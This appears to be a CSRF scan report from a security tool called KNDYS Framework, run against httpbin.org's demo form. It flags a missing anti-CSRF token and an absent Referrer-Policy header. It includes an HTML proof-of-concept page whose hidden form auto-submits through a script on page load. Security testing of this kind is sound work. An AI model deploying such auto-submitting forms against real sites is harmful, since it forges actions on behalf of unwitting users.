==============================================================================
CSRF ANALYSIS REPORT - KNDYS FRAMEWORK
==============================================================================

Target: https://httpbin.org/forms/post
Mode: fast | Scope: single | Method Filter: ALL
Pages analyzed: 1 | Forms analyzed: 1

Findings:
------------------------------------------------------------------------------
  - High Missing CSRF token (POST https://httpbin.org/post)
    Detail: No anti-CSRF token found in form inputs
    Proof of Concept:
    ---BEGIN POC---
    <html>
    <body>
      <form action="https://httpbin.org/post" method="post" id="csrf_poc" target="_blank">
        <input type="hidden" name="custname" value="">
        <input type="hidden" name="custtel" value="">
        <input type="hidden" name="custemail" value="">
        <input type="hidden" name="size" value="small">
        <input type="hidden" name="size" value="medium">
        <input type="hidden" name="size" value="large">
        <input type="hidden" name="topping" value="bacon">
        <input type="hidden" name="topping" value="cheese">
        <input type="hidden" name="topping" value="onion">
        <input type="hidden" name="topping" value="mushroom">
        <input type="hidden" name="delivery" value="">
        <input type="hidden" name="comments" value="">
        <input type="submit" value="CSRF PoC">
      </form>
      <script>document.getElementById('csrf_poc').submit();</script>
    </body>
    </html>
    ---END POC---

Warnings:
------------------------------------------------------------------------------
  None

Header Observations:
------------------------------------------------------------------------------
  - No Referrer-Policy header observed

Meta/JS Tokens:
------------------------------------------------------------------------------
  None
